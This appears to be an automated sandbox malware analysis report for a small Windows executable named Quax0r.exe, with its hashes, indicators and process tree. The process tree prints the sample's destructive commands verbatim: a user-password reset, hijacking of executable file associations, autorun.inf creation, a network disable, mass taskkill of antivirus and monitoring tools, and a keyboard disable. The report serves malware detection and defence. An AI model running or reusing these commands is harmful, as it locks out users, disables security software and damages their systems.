Analysis
-
max time kernel
150s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
01-06-2022 09:10
Static task
static1
Behavioral task
behavioral1
Sample
Quax0r.exe
Resource
win7-20220414-en
General
-
Target
Quax0r.exe
-
Size
16KB
-
MD5
779b96f25a5c23fb88062503290e69ce
-
SHA1
1d3b85c38418d296ced87fb7155e40aad8cb0773
-
SHA256
cd1bb0b84729b272e28a48cdfc22ef1f2577e4a1779a9fe871e54cf71707ded8
-
SHA512
7ac94fb7d832302f0aba124f41e168d00e1b3567ff88b7938c25cfb4dd72539e80b56862abf65be99f800d2dec034dbab56be3d5021175a314beee65def9ce3a
Malware Config
Signatures
-
Drops startup file 1 IoCs
Processes:
Quax0r.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini Quax0r.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 30 IoCs
Processes:
Quax0r.exedescription ioc process File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini Quax0r.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini Quax0r.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini Quax0r.exe File created C:\Users\Admin\Favorites\Links for United States\desktop.ini Quax0r.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I7JGZPUA\desktop.ini Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI Quax0r.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini Quax0r.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini Quax0r.exe File created C:\Users\Admin\Favorites\desktop.ini Quax0r.exe File created C:\Users\Admin\Favorites\Links\desktop.ini Quax0r.exe File created C:\Users\Admin\Music\desktop.ini Quax0r.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini Quax0r.exe File created C:\Program Files (x86)\desktop.ini Quax0r.exe File created C:\Users\Admin\Videos\desktop.ini Quax0r.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2HTZSS82\desktop.ini Quax0r.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini Quax0r.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini Quax0r.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Quax0r.exe File created C:\Users\Admin\Desktop\desktop.ini Quax0r.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini Quax0r.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini Quax0r.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\N4DR1BTE\desktop.ini Quax0r.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini Quax0r.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini Quax0r.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini Quax0r.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini Quax0r.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini Quax0r.exe File created C:\Users\Admin\Pictures\desktop.ini Quax0r.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini Quax0r.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D396AG1W\desktop.ini Quax0r.exe -
Drops autorun.inf file 1 TTPs
Malware can abuse Windows Autorun to spread further via attached volumes.
-
Drops file in Program Files directory 64 IoCs
Processes:
Quax0r.exedescription ioc process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_ON.GIF Quax0r.exe File created C:\Program Files (x86)\Windows Media Player\es-ES\WMPMediaSharing.dll.mui Quax0r.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFFile_8.ico Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic 2.xml Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FEZIP.POC Quax0r.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\fr\System.Data.Entity.Resources.dll Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\IPMS.ICO Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\TYPE.WAV Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0292278.WMF Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18196_.WMF Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\TexturedBlue.css Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\SUBMIT.JS Quax0r.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\PresentationCore.dll Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107026.WMF Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\AUDIOSEARCHLTS.DLL Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\GostTitle.XSL Quax0r.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00669_.WMF Quax0r.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\slideShow.html Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00169_.GIF Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18243_.WMF Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis\HEADER.GIF Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL020.XML Quax0r.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\8.png Quax0r.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Adobe AIR Application Installer.exe Quax0r.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\PROOF\MSWDS_EN.LEX Quax0r.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\HostSideAdapters\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.dll Quax0r.exe File created C:\Program Files (x86)\Common Files\microsoft shared\ink\de-DE\InkObj.dll.mui Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14538_.GIF Quax0r.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_top_left.png Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01462_.WMF Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\WWINTL.DLL.IDX_DLL Quax0r.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\css\flyout.css Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01297_.GIF Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml Quax0r.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\js\settings.js Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00172_.WMF Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02748G.GIF Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Blog.dotx Quax0r.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full_partly-cloudy.png Quax0r.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RIPPLE\THMBNAIL.PNG Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00045_.WMF Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01849_.WMF Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ACEDAO.DLL Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\IPEDINTL.DLL Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OIS_COL.HXC Quax0r.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\js\library.js Quax0r.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSOICONS.EXE Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0278702.WMF Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00704_.WMF Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\CLASSIC1.WMF Quax0r.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\JPEGIM32.FLT Quax0r.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\PROPLUS\SETUP.XML Quax0r.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Onix32.dll Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0293844.WMF Quax0r.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\fr\UIAutomationClientsideProviders.resources.dll Quax0r.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\IMCONTACT.DLL Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00105_.WMF Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00382_.WMF Quax0r.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\System.Web.Entity.dll Quax0r.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_ja.dll Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG Quax0r.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\BORDERS\MSART12.BDR Quax0r.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 1720 taskkill.exe -
Modifies registry class 6 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.exe cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = "RozbehOfSatanFile " cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "RozbehOfSatanFile " cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "RozbehOfSatanFile" cmd.exe -
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
taskkill.exedescription pid process Token: SeDebugPrivilege 1720 taskkill.exe -
Suspicious use of WriteProcessMemory 40 IoCs
Processes:
Quax0r.execmd.exenet.execmd.execmd.exedescription pid process target process PID 1668 wrote to memory of 1328 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 1328 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 1328 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 1328 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 1752 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 1752 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 1752 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 1752 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 1172 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 1172 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 1172 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 1172 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 1444 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 1444 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 1444 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 1444 1668 Quax0r.exe cmd.exe PID 1328 wrote to memory of 1684 1328 cmd.exe net.exe PID 1328 wrote to memory of 1684 1328 cmd.exe net.exe PID 1328 wrote to memory of 1684 1328 cmd.exe net.exe PID 1328 wrote to memory of 1684 1328 cmd.exe net.exe PID 1668 wrote to memory of 1284 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 1284 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 1284 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 1284 1668 Quax0r.exe cmd.exe PID 1684 wrote to memory of 2020 1684 net.exe net1.exe PID 1684 wrote to memory of 2020 1684 net.exe net1.exe PID 1684 wrote to memory of 2020 1684 net.exe net1.exe PID 1684 wrote to memory of 2020 1684 net.exe net1.exe PID 1668 wrote to memory of 360 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 360 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 360 1668 Quax0r.exe cmd.exe PID 1668 wrote to memory of 360 1668 Quax0r.exe cmd.exe PID 1284 wrote to memory of 1612 1284 cmd.exe netsh.exe PID 1284 wrote to memory of 1612 1284 cmd.exe netsh.exe PID 1284 wrote to memory of 1612 1284 cmd.exe netsh.exe PID 1284 wrote to memory of 1612 1284 cmd.exe netsh.exe PID 360 wrote to memory of 1720 360 cmd.exe taskkill.exe PID 360 wrote to memory of 1720 360 cmd.exe taskkill.exe PID 360 wrote to memory of 1720 360 cmd.exe taskkill.exe PID 360 wrote to memory of 1720 360 cmd.exe taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Quax0r.exe"C:\Users\Admin\AppData\Local\Temp\Quax0r.exe"1⤵
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net users %username% LOCKEDBYROZBEHOFSATAN2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet users Admin LOCKEDBYROZBEHOFSATAN3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 users Admin LOCKEDBYROZBEHOFSATAN4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c assoc .exe=RozbehOfSatanFile && assoc .bat=RozbehOfSatanFile && assoc .cmd=RozbehOfSatanFile2⤵
- Modifies registry class
-
C:\Windows\SysWOW64\cmd.execmd.exe /c echo ^[autorun^] > ..\\autorun.inf2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c echo open^=WindowsScan^.exe >> ..\\autorun.inf2⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c netsh Interface Set Interface Wi-Fi 12 disable2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh Interface Set Interface Wi-Fi 12 disable3⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /im chrome.exe /f && taskkill /im WireShark.exe /f && taskkill /im MSASCUI.exe /f && taskkill /im taskmgr.exe /f && taskkill /im regedit.exe /f && taskkill /im Kaspersky.exe /f && taskkill /im msseces.exe /f && taskkill /im nod32.exe /f && taskkill /im msmpeng.exe /f && taskkill /im navapsvc.exe /f && taskkill /im avkwctl.exe /f && taskkill /im fsav32.exe /f && rundll32 keyboard,disable2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im chrome.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\autorun.infFilesize
35B
MD5261490e22651f58aeb72b82b148f1e02
SHA1f180054e9592561288db216c9fb156a99ad5830f
SHA256b12b5eb5be8ef735ed43076e438f438a34adf362a27b187aeba422a4e831b4ba
SHA51283edf93509d5cc5f275c5877bcf571cf5a8716df603783155bb88338008d409ff5041dfb040253c400750e000e51c9eb8c26cb714cd06186ab9b00fc44b2769c
-
memory/360-69-0x0000000000000000-mapping.dmp
-
memory/1172-60-0x0000000000000000-mapping.dmp
-
memory/1284-66-0x0000000000000000-mapping.dmp
-
memory/1328-58-0x0000000000000000-mapping.dmp
-
memory/1444-61-0x0000000000000000-mapping.dmp
-
memory/1612-71-0x0000000000000000-mapping.dmp
-
memory/1668-73-0x0000000071040000-0x0000000071D5D000-memory.dmpFilesize
13.1MB
-
memory/1668-76-0x0000000070800000-0x0000000070F3E000-memory.dmpFilesize
7.2MB
-
memory/1668-64-0x00000000741A0000-0x0000000074980000-memory.dmpFilesize
7.9MB
-
memory/1668-79-0x0000000071F00000-0x00000000720D1000-memory.dmpFilesize
1.8MB
-
memory/1668-67-0x0000000071F00000-0x00000000720D1000-memory.dmpFilesize
1.8MB
-
memory/1668-78-0x0000000072AF0000-0x0000000073E7F000-memory.dmpFilesize
19.6MB
-
memory/1668-57-0x00000000720E0000-0x0000000072AF0000-memory.dmpFilesize
10.1MB
-
memory/1668-56-0x0000000072AF0000-0x0000000073E7F000-memory.dmpFilesize
19.6MB
-
memory/1668-70-0x0000000071D60000-0x0000000071EF4000-memory.dmpFilesize
1.6MB
-
memory/1668-55-0x00000000762C1000-0x00000000762C3000-memory.dmpFilesize
8KB
-
memory/1668-77-0x00000000706A0000-0x0000000070769000-memory.dmpFilesize
804KB
-
memory/1668-54-0x0000000001130000-0x000000000113C000-memory.dmpFilesize
48KB
-
memory/1668-74-0x0000000070F40000-0x000000007103C000-memory.dmpFilesize
1008KB
-
memory/1684-63-0x0000000000000000-mapping.dmp
-
memory/1720-72-0x0000000000000000-mapping.dmp
-
memory/1752-59-0x0000000000000000-mapping.dmp
-
memory/2020-68-0x0000000000000000-mapping.dmp